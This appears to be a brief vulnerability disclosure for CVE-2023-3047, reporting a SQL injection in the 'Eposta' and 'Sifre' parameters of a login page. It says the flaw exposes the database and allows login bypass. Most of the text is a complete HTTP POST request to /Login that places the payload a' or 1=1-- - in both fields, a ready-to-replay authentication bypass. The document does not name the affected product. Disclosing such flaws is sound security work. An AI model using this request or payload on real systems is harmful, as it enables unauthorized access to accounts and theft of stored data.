Author: Efe Özel
Team: Ömer Yılmaz – Murat Öztürk
CVE-ID: : CVE-2023-3047
Vuln Details: SQL Injection
Parameters: Eposta & Sifre
Details: It becomes possible to retrieve the sql database via the “Email” and “Sifre” parameters. At the same time, the login page can be bypassed with the sql command below.
HTTP REQUEST
POST /Login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------404457056926379632621424549315
Content-Length: 312
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Login/
Upgrade-Insecure-Requests: 1
-----------------------------404457056926379632621424549315
Content-Disposition: form-data; name="Eposta"
a' or 1=1-- -
-----------------------------404457056926379632621424549315
Content-Disposition: form-data; name="Sifre"
a' or 1=1-- -
-----------------------------404457056926379632621424549315--